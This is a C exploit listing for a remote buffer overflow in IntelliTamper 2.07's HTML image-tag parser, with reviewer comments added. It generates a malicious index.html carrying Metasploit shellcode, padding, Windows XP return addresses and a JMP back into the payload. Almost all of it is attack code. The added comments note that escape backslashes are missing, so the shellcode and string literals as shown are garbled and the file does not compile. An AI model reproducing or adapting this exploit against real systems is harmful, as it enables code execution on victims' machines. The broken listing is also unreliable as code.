
# Title : IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
# Published : 2008-08-03
# Author : r0ut3r


/*
* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
*
* Discovered & Written by r0ut3r (writ3r [at] gmail.com)
* Many Thanks to Luigi Auriemma (http://aluigi.org)
*
* Greets to shinnai (http://www.shinnai.net)
* and Guido Landi
*
* IntelliTamper contains a remote buffer overflow vulnerability.
* The HTML parser, more precisely the image tag handler, fails to perform
* boundary checks on supplied data.
*
* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c
* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0
* [!] OS: Microsoft Windows XP Pro SP 2
* [+] Building payload
* [+] Inserting JMP code
* [+] Success writing to index.html
* kit:/home/r0ut3r/public_html/imgsrc-xpl #
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* win32_exec -  EXITFUNC=thread CMD=c:windowssystem32calc.exe Size=184
Encoder=PexFnstenvSub http://metasploit.com
Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */
/* Payload bytes that main() copies verbatim into the generated <img src="...">
 * URL with sprintf("%s", ...), so the array is treated as a C string: a 0x00
 * byte would truncate it, which is why 0x00 is in the filtered list above.
 * NOTE(review): in this copy of the listing the backslashes of the \xNN
 * escapes are missing, so as shown the initializer is plain ASCII text and
 * not the 184 bytes the header describes — compare with the original source. */
unsigned char shellcode[] =
"x31xc9x83xe9xd8xd9xeexd9x74x24xf4x5bx81x73x13x99"
"xebx8dx6ax83xebxfcxe2xf4x65x03xc9x6ax99xebx06x2f"
"xa5x60xf1x6fxe1xeax62xe1xd6xf3x06x35xb9xeax66x23"
"x12xdfx06x6bx77xdax4dxf3x35x6fx4dx1ex9ex2ax47x67"
"x98x29x66x9exa2xbfxa9x6execx0ex06x35xbdxeax66x0c"
"x12xe7xc6xe1xc6xf7x8cx81x12xf7x06x6bx72x62xd1x4e"
"x9dx28xbcxaaxfdx60xcdx5ax1cx2bxf5x66x12xabx81xe1"
"xe9xf7x20xe1xf1xe3x66x63x12x6bx3dx6ax99xebx06x02"
"xa5xb4xbcx9cxf9xbdx04x92x1ax2bxf6x3axf1x04x43x8a"
"xf9x83x15x94x13xe5xdax95x7ex88xb7x36xeex82xe3x0e"
"xf6x9cxfex36xeax92xfex1exfcx86xbex58xc5x88xecx06"
"xfaxc5xe8x12xfcxebx8dx6a";

/* Single opcode byte that main() writes directly after the target address;
 * it is followed by a 4-byte displacement computed back to jmpref. */
#define JMP 0xe9 //JMP

/*
 * Entry point: assembles one HTML <img> tag whose src attribute carries the
 * shellcode, a run of 'A' padding, a per-target 4-byte address and a
 * backwards JMP, then writes the tag to ./index.html (overwriting any
 * existing file of that name in the current directory).
 *
 * argv[1] selects the target (0 or 1, an index into targets[]).
 * Returns 0 on success, 1 on a usage error or if index.html cannot be opened.
 *
 * Reviewer notes on this listing as shown:
 *  - The switch on argv[1] has no default case, so for any value other than
 *    0 or 1 `opt` stays uninitialized and targets[opt] is read anyway (UB).
 *  - The "\n" escapes and the inner quotes of the printf/sprintf literals
 *    have lost their backslashes in this copy; as shown the file does not
 *    compile — compare with the original source before drawing conclusions.
 *  - The two *(unsigned int *)p stores are unaligned, type-punned writes into
 *    a char buffer and assume a 32-bit little-endian unsigned int; memcpy()
 *    would be the well-defined form.
 *  - The fwrite() return value is not checked.
 * For defenders: the produced page is a single <img> whose src is roughly
 * 3 KB long and consists mostly of 'A' bytes (3065 bytes from jmpref
 * onwards), an easy signature for a content filter or proxy log review.
 */
int main(int argc, char* argv[])
{
    FILE *fd;
    unsigned char buff[4000],   /* output buffer; roughly 3.1 KB of it is used */
                *jmpref,        /* where the shellcode starts inside buff; the trailing JMP points here */
                *p;             /* write cursor into buff */
    int opt;                    /* index into targets[]; only assigned for argv[1] "0" or "1" */

    /* Per-target 4-byte value appended right after the padding. The field
     * name marks it as the EIP value for that Windows build; the entries map
     * 1:1 to the 0/1 choices in the usage text. */
    struct
    {
        char *os;
        unsigned int eip;
    } targets[] =
        {
            "Microsoft Windows XP Pro SP 2",
            0x7d040e1f,

            "Microsoft Windows XP Pro SP 3",
            0x7c8369f0
        };

    /* Usage banner when no target was given. */
    if (argc < 2)
    {
        printf("---------------------------------------------------------n");
        printf("     IntelliTamper 2.07 Remote Buffer Overflow Expoit    nn");

        printf("  Discovered & Written by r0ut3r (writ3r [at] gmail.com)n");
        printf("       Thanks to Luigi Auriemma (http://aluigi.org)nn");

        printf("  Usage: %s <OS-type>n", argv[0]);
        printf("      0: Microsoft Windows XP Pro SP2n");
        printf("      1: Microsoft Windows XP Pro SP3n");
        printf("---------------------------------------------------------n");
        return 1;
    }

    p = buff;

    /* atoi() reports no parse error ("abc" becomes 0), and there is no
     * default branch: any other value leaves opt uninitialized. */
    switch (atoi(argv[1]))
    {
        case 0:
            opt = 0;
            printf("[!] OS: %sn", targets[0].os);
        break;

        case 1:
            opt = 1;
            printf("[!] OS: %sn", targets[1].os);
        break;
    }

    printf("[+] Building payloadn");
    /* Opening of the tag; the src value begins right after "http://". */
    p += sprintf(p, "<img src="http://");

    jmpref = p;

    /* Shellcode is copied as a C string, so it ends at its first 0x00 byte. */
    p += sprintf(p, "%s", shellcode);

    int i;
    /* Pad so that the address below always lands exactly 3065 bytes past
     * jmpref, independent of the shellcode length. */
    int a = 3065 - (p - jmpref);
    for (i=0; i < a; i++)
        *p++ = 'A';

    /* Unaligned 4-byte store of the per-target address (see header note). */
    *(unsigned int *) p = targets[opt].eip;
    p += 4;

    printf("[+] Inserting JMP coden");

    *p++ = JMP;
    /* Displacement is measured from the end of the 5-byte JMP (p + 4), so it
     * is negative and lands on jmpref. The ptrdiff_t result is narrowed to
     * unsigned int here, which is implementation-defined. */
    *(unsigned int *) p = jmpref - (p + 4); //JMP -(3065+4+5)
    p += 4;

    /* Close the src attribute and the tag. */
    p += sprintf(p, "">");

    /* "wb": binary mode so the raw bytes are not translated on Windows hosts;
     * an existing index.html is truncated without warning. */
    fd = fopen("index.html", "wb");
    if (fd == NULL)
    {
        perror("[-] Failed opening index.htmln");
        return 1;
    }

    /* NOTE(review): short writes are not detected here; only fclose() is checked. */
    fwrite(buff, 1, p - buff, fd);
    if (fclose(fd) == 0)
        printf("[+] Success writing to index.htmln");
    else
        printf("[-] Failed writing to index.htmln");

    return 0;
}
